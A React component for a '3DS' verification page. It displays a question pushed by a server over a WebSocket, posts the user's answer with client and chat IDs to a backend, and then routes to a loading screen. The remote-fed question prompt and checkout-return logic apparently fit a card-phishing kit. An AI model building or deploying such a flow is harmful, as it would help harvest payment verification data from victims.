import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';
import StandardCardLayout from './StandardCardLayout';
import { useWebSocket } from '../hooks/useWebSocket';
import { t } from '../utils/i18n';
import { SERVER_URL } from '../utils/config';

export const QuestionPage = () => {
  const navigate = useNavigate();
  const { questionText, customInputPrompt } = useWebSocket();

  const [answer, setAnswer] = useState('');
  const [error, setError] = useState('');
  const [submitting, setSubmitting] = useState(false);

  const promptText =
    questionText ||
    customInputPrompt ||
    localStorage.getItem('question_details') ||
    localStorage.getItem('custom_input_prompt') ||
    t('questionSubtitle');

  const handleSubmit = async (e) => {
    if (e && e.preventDefault) e.preventDefault();
    if (!answer.trim()) {
      setError(t('enterAnswer'));
      return;
    }

    setError('');
    setSubmitting(true);

    try {
      const clientId = localStorage.getItem('clientUuId');
      const chatId = localStorage.getItem('chatId');
      await axios.post(`${SERVER_URL}/api/question`, {
        clientId,
        answer: answer.trim(),
        chatId,
      });
      navigate('/3ds/loading');
    } catch {
      setError(t('enterAnswer'));
    } finally {
      setSubmitting(false);
    }
  };

  const handleCancel = () => {
    const geo = localStorage.getItem('geo') || 'vn';
    const checkoutPath = localStorage.getItem('checkout_path') || `/${geo}/homepage`;
    navigate(checkoutPath);
  };

  return (
    <StandardCardLayout
      mode="question"
      questionText={promptText}
      inputValue={answer}
      onInputChange={(val) => {
        setAnswer(val);
        if (error) setError('');
      }}
      onSubmit={handleSubmit}
      onCancel={handleCancel}
      error={error}
      submitting={submitting}
    />
  );
};

export default QuestionPage;
